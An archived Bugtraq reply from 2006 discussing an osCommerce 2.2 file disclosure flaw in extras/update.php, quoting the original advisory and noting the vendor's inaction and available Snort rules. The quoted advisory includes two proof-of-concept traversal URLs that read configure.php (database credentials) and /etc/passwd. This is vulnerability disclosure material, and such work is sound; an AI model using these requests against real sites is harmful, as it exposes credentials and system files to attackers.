lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <B3BCAF4246A8A84983A80DAB50FE7242396B94@secnap2.secnap.com>
Date: Sat, 15 Apr 2006 08:39:14 -0400
From: "Michael Scheidell" <scheidell@...nap.net>
To: <rgod@...istici.org>, <bugtraq@...urityfocus.com>
Cc: <andiroo@...il.com>
Subject: RE: osCommerce  "extras/" information/source code disclosure


> -----Original Message-----
> From: rgod@...istici.org [mailto:rgod@...istici.org] 
> Sent: Friday, April 14, 2006 7:20 AM
> To: bugtraq@...urityfocus.com
> Subject: osCommerce "extras/" information/source code disclosure
> 
> 
> ---- osCommerce <= 2.2 "extras/" information/source code 
> disclosure ------------
> 
> software site: http://www.oscommerce.com/
> 
> 
> if extras/ folder is placed inside the www path, you can see 
> all files on target system, including php source code with 
> database details, poc:
> 
http://[target]/[path]/extras/update.php?read_me=0&readme_file=../catalo
g/includes/configure.php
http://[target]/[path]/extras/update.php?read_me=0&readme_file=/etc/pass
wd


Amazing:  this was reported to oscommerce almost a year ago by andiroo
blat gmail, and they didn't do anything about it?

http://sourceforge.net/mailarchive/message.php?msg_id=12318248

http://www.oscommerce.com/community/bugs,2835

For you snorters, rules have been posted to snort-sigs and bleeding
mailing list.






Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ